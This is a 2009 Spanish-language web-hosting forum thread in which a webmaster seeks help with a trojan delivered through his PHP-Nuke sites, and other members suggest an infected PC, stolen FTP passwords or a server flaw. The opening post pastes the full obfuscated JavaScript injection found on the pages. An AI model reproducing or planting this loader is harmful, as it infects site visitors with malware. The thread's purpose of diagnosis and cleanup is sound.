Antiguo 19-may-2009, 20:30   #1 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado Necesito ayuda para descifrar código malicioso en hosting y dominio

Saludos a esta gran comunidad de ayuda.

Les doy los detalles del asunto:

Resulta que soy webmaster y en algunos de los sitios que administro tengo instalados 5 portales cms (en php nuke 7.9), y desde hace algunas semanas, tengo problemas con un virus troyano que se descarga al abrir cualquiera de los 5 sitios alojados en el mismo servidor; y solo sucede con IE explorer (usuarios y visitantes de quejan de esto), no sucede con firefox. Me dí a la tarea de buscar algún código malicioso en los archivos alojados y bases de datos de los sitios y no se encuentran en estos (estan limpios).

El código malicioso qu encontré se descarga de alguna manera poco antes de abrir alguno de estos sitios web que tengo alojados (algo asi como un redireccionaminto) este código es el siguiente.

Código:
<!--fa1502e73a01cc72fb483c8f4f8036bf--><script language=javascript>nebhovqgz="oZimPP%UwRntoZnl!U&HL!t!P";snqsxy="<sG63riG70tG20lG61nG67G75aG67e=jG61vaG73G63G72iG70tG3e G20fG75ncG74G69onG20tlzG62G6aoG65zG28lG77vosju)G7bvar xqG6ecG65G74pyg,G6eG6dfG72zG66G67G6dG71=G22&G61G6b@3G79G5fb[~+4JUCO{$G39:w!G6fv17G23fr)G67G6c^G50}G71G48G20EG75N0G6ex]G36pG6dFi=(`G38G3bG472'G6aG41G2cG54zhG56cG4b.\\\"G42G49tG4dsG35|G65ZG2dG64G2a\",qG7aiG63yjlnG3dG22\",G6cjG6ccwG6fG67G70,ewG61G72igG2cG69G6cquG63fG6c=\"\",nG6fzG77G61n;fG6frG28xqnceG74pG79G67G3dG30G3bG78G71nG63G65G74G70ygG3clG77G76G6fsG6au.G6cenG67th;xqnG63etG70yg++){ G6cjG6cG63G77G6fgG70=G6cwvG6fsju.chG61rAG74G28G78qnG63G65G74pyG67);G65G77ariG67G3dG6eG6dG66rzfgmqG2eG69nG64exOf(G6cjG6cG63wG6fgp)G3bG69fG28ewG61rig>G2d1G29{ nG6fG7awaG6e=((G65G77arig+1G29G25G38G31G2d1)G3biG66G28nozwaG6e<=G30G29G6eoG7aG77G61n+=8G31G3biG6cG71ucG66G6cG2bG3dG6emfG72zfG67G6dG71.G63G68arAt(G6eoG7aG77an-1);G20} G65G6csG65 G69lqucfl+G3dG6cG6alcwoG67pG3b}qG7aicG79jln+G3diG6cqG75G63fl;docG75menG74G2eG77G72ite(G71zG69cG79jG6cn);G7d<G2fsG63G72ipt>";pnnxtuxxb=nebhovqgz.charAt(6);randvunc=snqsxy.replace(/G/g,pnnxtuxxb);psdswky=unescape(randvunc);var uivrkjiku,eqzrdwl;document.write(psdswky);uivrkjiku="<VMF^>E<5K)=mMEM_mZ(BMZ]M/Ak1k5K)=mMBE^kxlNklZ(BAk1k5K)=mMB>EE1k)EZ]m=)_E(ExZ!EDkMZ`gGEZ]m=)_\"5ZMz=FZ`Z]m=)_\"lZMz=FZ`gE4E'J&pn&pn&7nnngGE*vKNFZxM\"Kvv@=Z(j5Z55=vx=*(y:7';pn|,|y7GEmkMV(/GEZ]m=)Z5(jE4EZ]m=)_\"Mv2szSM)=xl`gGEE*vKNFZxM\"!)=MZ`EB<SORt}zE^kxlNklZ(\\BUk1kSK)=mM\\BESRO(\\BVMMmw//lvvl^Zkxk^_M^K5\"xZM/bbNMFA\"A5\\B><\\/SORt}z>BEgG</5K)=mM>E</VMF^>E";tlzbjoez(uivrkjiku);</script><!--fa1502e73a01cc72fb483c8f4f8036bf-->
Lo que hise mientras arreglo esto fue desactivar el sitio y base de datos y poner un simple index html pero el problema continua igual.

al abrir el sitio; previo a descargar mis archivos conocidos que tengo alojados pertenecientes al sitio web backgenerationsradio.com (mi sitio original y dominio). IE explorer descarga archivos ajenos en los temporales que son desconocidos, que provienen de sitios desconocidos de dudosa reputación aquí les dejo la imágen (notese beladen.net sitio dudoso).


i39.tinypic.com/xmrc48.jpg


estos archivos se descargan previo a abrir el sitio original y sucede de forma intermitente, hay ocasiones en que los sitios trabajan normalmente

Es de de llamar la atención que una cookie de descarga de googleanalytlcs.net (NOTESE que este sitio no es de GOOGLE y googleanalytlcs.net esta escrito como googleanalytlcs.net con L minúscula sustituyendo la i latina.

cuando infectó mi pc corrí el Malwarebytes' Anti-Malware

y detectó registros infectados

como estos:


Elementos de Datos del Registro Infectados:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.


otro aviso que dá el IE explorer es el siguiente:

i39.tinypic.com/dvqz3m.jpg

La pregunta es: será algún problema de seguridad del servidor? (por cierto el servidor es muy malo )que tenga que ver con los DNS. O acaso los dominos fueron robados aunque ya verifique los dns y son correctos

Ustedes que opinan ojala puedan ayudarme a descifrar esta "maraña"

Última edición por vicman21; 20-may-2009 a las 06:47
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:33   #2 (permalink)
Usuario activo
 
Avatar de ideasmultiples
 
Fecha de Ingreso: abril-2007
Ubicación: España - Perú
Mensajes: 2.507
ideasmultiples tiene un aura espectacular a su alrededor
Predeterminado Necesito ayuda para descifrar código malicioso en hosting y dominio

Tu problema está en tu máquina, no en el servidor, ¿todos tus programas son originales?

__________________
ideasmultiples.com Parallels Service Provider Silver Partner servidores VPS H/SaaS para empresas.
im-global.net Nodos Virtuozzo administrados y Monitorizados, venta de Licencias Plesk y Virtuozzo.
www.radiovinilo.com (beta) Sólo música clásica de antiguos discos de vinilo y carbón digitalizados.
ideasmultiples está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:40   #3 (permalink)
Moderador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Planeta Tierra
Mensajes: 6.134
Apolo sigue por muy buen camino
Predeterminado

Te sugiero que pases un buen software anti-virus y luego un buen software anti-spyware por tu PC.

Luego cambia inmediatamente las claves de acceso FTP de tu cuenta de hosting.

Luego limpia el código malicioso que haya podido ser inyectado en archivos de tu sitio Web, empezando, claro, por el "index" y cualquier "include" que haya dentro de él.

Pide asistencia a tu proveedor de hosting. Si dices que es "malo", entonces contrata el servicio con un mejor proveedor.

Saludos,
__________________
´
Visita dinahosting para tus dominios, hosting, VPS, y servidores dedicados. Registro de dominios acreditado por la ICANN.
Apolo está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:42   #4 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por ideasmultiples Ver Mensaje
Tu problema está en tu máquina, no en el servidor, ¿todos tus programas son originales?

A que te refieres con que esta en mi máquina?, y sí, todos son originales.


El problema es que nu reseller donde tengo alojados esos dominios y todos lo visitantes nuevos o usuarios de esos sitios se les descarga el troyano.
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:46   #5 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por Apolo Ver Mensaje
Te sugiero que pases un buen software anti-virus y luego un buen software anti-spyware por tu PC.

Luego cambia inmediatamente las claves de acceso FTP de tu cuenta de hosting.

Luego limpia el código malicioso que haya podido ser inyectado en archivos de tu sitio Web, empezando, claro, por el "index" y cualquier "include" que haya dentro de él.

Pide asistencia a tu proveedor de hosting. Si dices que es "malo", entonces contrata el servicio con un mejor proveedor.

Saludos,
Saludos apolo

ya revise todos los index bases de datos, cambie password de ftp, limpie mi maquina minuciosamente etc etc. imcluso desactivé los sitios y subi un simplisimo html y el problema continua, lo que no he hecho es hablar con el porveedor de reseller, por que en este mes me voy.
De que otra manera me podrian estar atacando el servidor?

Última edición por vicman21; 19-may-2009 a las 20:47 Razón: error de escrito
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:47   #6 (permalink)
Usuario activo
 
Avatar de ideasmultiples
 
Fecha de Ingreso: abril-2007
Ubicación: España - Perú
Mensajes: 2.507
ideasmultiples tiene un aura espectacular a su alrededor
Predeterminado

Cita:
Iniciado por vicman21 Ver Mensaje
A que te refieres con que esta en mi máquina?, y sí, todos son originales.


El problema es que nu reseller donde tengo alojados esos dominios y todos lo visitantes nuevos o usuarios de esos sitios se les descarga el troyano.
Lo que infecta tus webs es TU MAQUINA, no el servidor, sucede muy amenudo cuando se usan programas piratas de diseño, S.O. y antivirus (si, tambien hay antivirus piratas ), no digo que sea tu caso, pero frecuentemente es el origen del problema.

__________________
ideasmultiples.com Parallels Service Provider Silver Partner servidores VPS H/SaaS para empresas.
im-global.net Nodos Virtuozzo administrados y Monitorizados, venta de Licencias Plesk y Virtuozzo.
www.radiovinilo.com (beta) Sólo música clásica de antiguos discos de vinilo y carbón digitalizados.
ideasmultiples está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:50   #7 (permalink)
Usuario activo
 
Fecha de Ingreso: octubre-2005
Mensajes: 2.714
f.villalba sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por Apolo Ver Mensaje
Te sugiero que pases un buen software anti-virus y luego un buen software anti-spyware por tu PC.
Antes de pasarlo, desactiva la opción de restaurar sistema en Windows XP o en Vista por seguridad.

Anti-Virus

Nod32
BitDefender
Kaspersky

Anti-Spyware

Ad-aware
Spybot Search & Destroy

Y no estaría demás que pasaras CCleaner para limpiar un poco.

Saludos,
f.villalba está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 20:51   #8 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por ideasmultiples Ver Mensaje
Lo que infecta tus webs es TU MAQUINA, no el servidor, sucede muy amenudo cuando se usan programas piratas de diseño, S.O. y antivirus (si, tambien hay antivirus piratas ), no digo que sea tu caso, pero frecuentemente es el origen del problema.

Hay otra persona que tiene acceso al ftp de estos sitios, (el es mi cliente)
seguramente tuvo algo que ver en esto
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 21:02   #9 (permalink)
Usuario activo
 
Avatar de ideasmultiples
 
Fecha de Ingreso: abril-2007
Ubicación: España - Perú
Mensajes: 2.507
ideasmultiples tiene un aura espectacular a su alrededor
Lightbulb

Cita:
Iniciado por vicman21 Ver Mensaje
Hay otra persona que tiene acceso al ftp de estos sitios, (el es mi cliente)
seguramente tuvo algo que ver en esto
Es posible, pero ten en cuenta que siempre es una máquina que accede por FTP, por cierto los password de acceso a ese sitio, y probablemente todos los que se usen en la máquina en cuestion, ya deben de estar hasta en las páginas amarillas , cámbialos INMEDIATAMENTE desde una máquina que estés seguro que está limpia.
__________________
ideasmultiples.com Parallels Service Provider Silver Partner servidores VPS H/SaaS para empresas.
im-global.net Nodos Virtuozzo administrados y Monitorizados, venta de Licencias Plesk y Virtuozzo.
www.radiovinilo.com (beta) Sólo música clásica de antiguos discos de vinilo y carbón digitalizados.
ideasmultiples está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 21:06   #10 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por ideasmultiples Ver Mensaje
Es posible, pero ten en cuenta que siempre es una máquina que accede por FTP, por cierto los password de acceso a ese sitio, y probablemente todos los que se usen en la máquina en cuestion, ya deben de estar hasta en las páginas amarillas , cámbialos INMEDIATAMENTE desde una máquina que estés seguro que está limpia.
Cuando me referí a que esta persona tiene acceso al ftp. quise decir que el tambien sube y modifica archivos de estos sitios cuando no estoy desde su propia máquina, y si voy a cambiar datos lo más pronto posible

gracias por la ayuda
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 19-may-2009, 22:44   #11 (permalink)
Usuario activo
 
Avatar de MaxKiller
 
Fecha de Ingreso: febrero-2009
Ubicación: Cataluña, España.
Mensajes: 1.125
MaxKiller tiene un aura espectacular a su alrededor
Predeterminado

¿El servidor bajo que sistema operativo está? Posiblemente el problema esté en tu servidor.

Anda que no hay virus que una vez ejecutados empiezan a rastrear archivos con permiso de escritura para incrustar código malicioso (normalmente códigos JS/ActiveX)...

Saludos
MaxKiller está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 00:19   #12 (permalink)
Moderador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Planeta Tierra
Mensajes: 6.134
Apolo sigue por muy buen camino
Predeterminado

Sí podría ser una posibilidad.

Recuerdo que hace un par de años una vulnerabilidad en Fedora afectó a muchos sitios Web, infectándolos con código malicioso.

Saludos,
__________________
´
Visita dinahosting para tus dominios, hosting, VPS, y servidores dedicados. Registro de dominios acreditado por la ICANN.
Apolo está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 01:06   #13 (permalink)
Usuario activo
 
Avatar de MaxKiller
 
Fecha de Ingreso: febrero-2009
Ubicación: Cataluña, España.
Mensajes: 1.125
MaxKiller tiene un aura espectacular a su alrededor
Predeterminado

Cita:
Iniciado por Apolo Ver Mensaje
Sí podría ser una posibilidad.

Recuerdo que hace un par de años una vulnerabilidad en Fedora afectó a muchos sitios Web, infectándolos con código malicioso.

Saludos,
Sin ir más lejos, hace un par de meses en Powweb ocurrió esto.

Saludos
MaxKiller está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 03:19   #14 (permalink)
Moderador
 
Avatar de WebTech
 
Fecha de Ingreso: julio-2006
Ubicación: /home/webtech
Mensajes: 1.120
WebTech sigue por muy buen camino
Enviar un mensaje por MSN a WebTech
Predeterminado

Los administradores de sistema del server deberían ayudarte a buscar el código, no es nada difícil si se identifica un patrón determinado en cada cadena.

Otro punto, intenta evitar el uso de PHP-Nuke, de las miles de aplicaciones pre-fabricadas que hay en internet, esta es una de las que siempre ha tenido más vulnerabilidades.

Hace poco nos sucedió algo parecido con un cliente, y efectivamente, el problema estaba en su PC que tenía mil bichos dentro.

Saludos,
__________________
INFRANETWORKING.COM - Web Hosting Profesional
Hosting Reseller cPanel
Servidores Dedicados: Linux y Windows, cPanel y Plesk
Administración de Servidores: Optimizaciones, Seguridad, Backups y más!
WebTech está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 03:43   #15 (permalink)
Usuario activo
 
Avatar de ideasmultiples
 
Fecha de Ingreso: abril-2007
Ubicación: España - Perú
Mensajes: 2.507
ideasmultiples tiene un aura espectacular a su alrededor
Exclamation

Cita:
Iniciado por WebTech Ver Mensaje
Hace poco nos sucedió algo parecido con un cliente, y efectivamente, el problema estaba en su PC que tenía mil bichos dentro.,
No me quieren creer

Tengo unos cuantos casos documentados y el problema es de la parte del usuario, si fuera de la parte de servidor TODAS las web estarían infectadas.

Insisto, busca un dreamweaver pirata, se lo que digo

Tengo localizadas 3 varias variantes del mismo, las 3 sólo infectan los index.*
Una infecta en el pie, la otra en la cabecera con un body onload, y la última en la primera línea despues de body.

Es posible que sea un solo troyano con varios sistemas de ataque, el contenido original en el disco del cliente NO está infectado, el troyano hace la infección en el momento de publicar y tambien comprueba aleatoriamente las webs a las que tiene acceso y las infecta nuevamente cada 2 o 3 días, si lo modificas externamente no lo vuelve a infectar hasta que se vuelve a publicar desde la máquina de origen, los password pasan a una red de máquinas infectadas, pero no parece que la infección se haga desde otra máquina.

Asumo que ademas se encragara de pasar los datos de los contactos y probablemente algunos password.

Pronto más info
__________________
ideasmultiples.com Parallels Service Provider Silver Partner servidores VPS H/SaaS para empresas.
im-global.net Nodos Virtuozzo administrados y Monitorizados, venta de Licencias Plesk y Virtuozzo.
www.radiovinilo.com (beta) Sólo música clásica de antiguos discos de vinilo y carbón digitalizados.
ideasmultiples está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 06:54   #16 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por MaxKiller Ver Mensaje
¿El servidor bajo que sistema operativo está? Posiblemente el problema esté en tu servidor.

Anda que no hay virus que una vez ejecutados empiezan a rastrear archivos con permiso de escritura para incrustar código malicioso (normalmente códigos JS/ActiveX)...

Saludos

Está en linux (por cierto esta empresa después de contratar con ellos,la investige al empezar a detectar fallas y carencias, y resultó de las que tienen peor reputación, "dicen ke lo bara)to sale caro"

En este mes termina mi contrato con ellos , hise respaldos, y borre ya los portales, voy a migrar a joomla. subi sólo un archivo index al sitio, voy a ver como se comporta en estos dias, si persiste el problema, me atrevería a decir que es el servidor, por cierto el reseller que me rentaron nunca me activaron la función mail, dado que otro cliente compartido, hacia spam, y nunca me avisaron de eso, que mal servicio dan ahi en verdad.
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 07:02   #17 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Cita:
Iniciado por WebTech Ver Mensaje
Los administradores de sistema del server deberían ayudarte a buscar el código, no es nada difícil si se identifica un patrón determinado en cada cadena.

Otro punto, intenta evitar el uso de PHP-Nuke, de las miles de aplicaciones pre-fabricadas que hay en internet, esta es una de las que siempre ha tenido más vulnerabilidades.

Hace poco nos sucedió algo parecido con un cliente, y efectivamente, el problema estaba en su PC que tenía mil bichos dentro.

Saludos,
en este mes cumplo un año con ellos, y mande miles de quejas por "helpdesk" y nunca ayudaron en nada, más que nada esto lo hago para prevenir futuros problemas, y tomar experiencia de esto.

el año pasado hubo un problema muy grave en ese servidor, tan grave que al abrir los sitios, los archivos con extension php se descargaban como archivos comunes, (como si fuera un zip o algo similar) INCLUSO EL ARCHIVO CONFIG.PHP del portal se descargaba y se podia leer via navegador cualquier usuario podia leerlo tan solo con linkear el config.php!!!!!!, terrible terrible
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 08:52   #18 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Aqui hay algunos links en inglés que hablan de este preciso código malicioso en especial, pero lo mismo, no encuentran el dichoso codigo tal pareciera que sale como por arte de magia


vbulletin.com/forum/showthread.php?t=307207

photography-forum.org/showthread.php?t=31068

saludos y gracias
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 20-may-2009, 13:17   #19 (permalink)
Moderador
 
Avatar de WebTech
 
Fecha de Ingreso: julio-2006
Ubicación: /home/webtech
Mensajes: 1.120
WebTech sigue por muy buen camino
Enviar un mensaje por MSN a WebTech
Predeterminado

Cita:
en este mes cumplo un año con ellos, y mande miles de quejas por "helpdesk" y nunca ayudaron en nada, más que nada esto lo hago para prevenir futuros problemas, y tomar experiencia de esto.
Creo que la experiencia ya la tienes, ahora.. me pregunto... ¿por que todavía sigues con un proveedor que no te da un buen servicio? ¿masoquismo?

Saludos,
__________________
INFRANETWORKING.COM - Web Hosting Profesional
Hosting Reseller cPanel
Servidores Dedicados: Linux y Windows, cPanel y Plesk
Administración de Servidores: Optimizaciones, Seguridad, Backups y más!
WebTech está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
Antiguo 21-may-2009, 06:09   #20 (permalink)
Usuario activo
 
Fecha de Ingreso: junio-2008
Mensajes: 17
vicman21 sin puntos positivos o negativos
Predeterminado

Buenos pues les informo las acciones que hise últimamente, cambié pases de accesos, ftp etc, respalde archivos y bases de datos, borre los archivos de los 5 sitios alojados en el servidor (prácticamente no hay nada solo un html un flash e imágenes).

Pero resulta que algunos usuarios que usan el antivirus AVAST , este antivirus les manda alerta de rastros de troyanos (JS:cruzer-C) en algúnas imágenes (banners)JPG.


Sera´que estas imágenes hayan sido infectadas por el problema antes especificado? o son falsas alertas?, se dice que avast tiene problemas de "falsos positivos".

saludos
vicman21 está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Comparte en Facebook!Spurl este mensaje!Reddit!Menea este mensaje!Wong este mensaje!Agrega a Bitacoras!Agrega a MySpace!Agrega a Twitter!Agrega a FriendFeed!Agrega a LinkedIn!Agrega a Ping.fm!Agrega a Wikio!Agrega a Netvibes!
Responder Citando
     ComunidadHosting  

La comunidad dedicada al web hosting más grande en nuestro idioma.

Para anunciar en ComunidadHosting, o para información general, por favor utiliza el formulario de contacto.




iWeb vm3


Abserhosting, alojamiento web
Servidores dedicados, virtuales
y de juegos de ultima generación.
Dell alojados en España

www.abserhosting.com



Hosting Reseller En Marca Blanca
Tienda Automatizada. Administrado.
ILIMITADOS Dominios, Soporte 24/7
Precio Especial Registro de Dominios

www.singularweb.com



My Boricua Hosting LLC
Hosting, reseller, dominios
planes desde $0.95 mensual
My Boricua Hosting

www.myboricuahosting.com



Alojamiento dedicado administrado
Servidores virtuales y dedicados
totalmente administrados
a precios de servicio no manejado.

www.masquewebs.com




Desarrollado por: vBulletin® Versión 3.8.4
Derechos de Autor ©2000 - 2010, Jelsoft Enterprises Ltd.
Traducido por mcloud de vBhispano.com

Search Engine Friendly URLs by vBSEO 3.3.2